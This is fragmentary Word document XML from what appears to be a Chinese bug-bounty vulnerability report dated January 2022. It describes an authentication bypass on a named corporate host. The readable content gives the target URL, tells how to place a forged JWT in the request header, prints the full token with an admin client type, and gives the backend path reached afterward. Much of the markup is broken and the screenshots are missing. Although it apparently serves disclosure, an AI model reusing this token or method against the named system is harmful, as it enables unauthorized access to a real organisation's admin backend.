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F1A0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4061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0BA76EE7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提交时间：2022-01-25 22:09:12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31565D59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5947F978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393A5E24" w14:textId="0BC7FDCB" w:rsidR="005D4061" w:rsidRDefault="005D4061" w:rsidP="005D40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125FF8F1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3A53FD" w14:textId="77777777" w:rsidR="005D4061" w:rsidRPr="005D4061" w:rsidRDefault="005D4061" w:rsidP="005D40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4061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4BB4BA45" w14:textId="77777777" w:rsidR="005D4061" w:rsidRPr="005D4061" w:rsidRDefault="005D4061" w:rsidP="005D40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漏洞url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5ACD18" w14:textId="77777777" w:rsidR="005D4061" w:rsidRPr="005D4061" w:rsidRDefault="005D4061" w:rsidP="005D406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http://crystalshield.mcd.com.cn:9091</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097AFE5E" w14:textId="77777777" w:rsidR="005D4061" w:rsidRPr="005D4061" w:rsidRDefault="005D4061" w:rsidP="005D40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我们直接把伪造的token值放进请求头：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D1E4F" w14:textId="77777777" w:rsidR="005D4061" w:rsidRPr="005D4061" w:rsidRDefault="005D4061" w:rsidP="005D406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eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJoaXJvb3AiLCJpZCI6IjE0MDciLCJjbGllbnRUeXBlIjoiYWRtaW4iLCJpYXQiOjE2NDMxMTg1MjcsImV4cCI6MTY0MzcyMzMyN30.ne8gxOLhzpuzRpv-g3j_H0SbHCb_9XP5HwBEzeo4BCk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3100A573" w14:textId="788BDBEB" w:rsidR="005D4061" w:rsidRPr="005D4061" w:rsidRDefault="005D4061" w:rsidP="005D40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D90D3E" wp14:editId="1F757811">
            <wp:extent cx="5274310" cy="1840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0413" w14:textId="77777777" w:rsidR="005D4061" w:rsidRPr="005D4061" w:rsidRDefault="005D4061" w:rsidP="005D40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最后直接访问后台界面就能成功进去：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A20F177" w14:textId="77777777" w:rsidR="005D4061" w:rsidRPr="005D4061" w:rsidRDefault="005D4061" w:rsidP="005D406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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://crystalshield.mcd.com.cn:9091/ProjectReform/plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDC54A5" w14:textId="3E00E92D" w:rsidR="005D4061" w:rsidRPr="005D4061" w:rsidRDefault="005D4061" w:rsidP="005D406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0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DDEBC0" wp14:editId="44D517DA">
            <wp:extent cx="5274310" cy="2548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A992" w14:textId="77777777" w:rsidR="0074708E" w:rsidRDefault="0074708E"/>
    <w:sectPr w:rsidR="0074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386C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B88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79"/>
    <w:rsid w:val="005D4061"/>
    <w:rsid w:val="0074708E"/>
    <w:rsid w:val="009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C5E0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0A172DC2-0E78-4DB7-8586-50D08B0C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D4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D406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ntenttime">
    <w:name w:val="content_time"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="005D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5D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5D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5D4061"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="contentcoins">
    <w:name w:val="content_coins"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="005D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2022-02-16T09:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-16T09:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>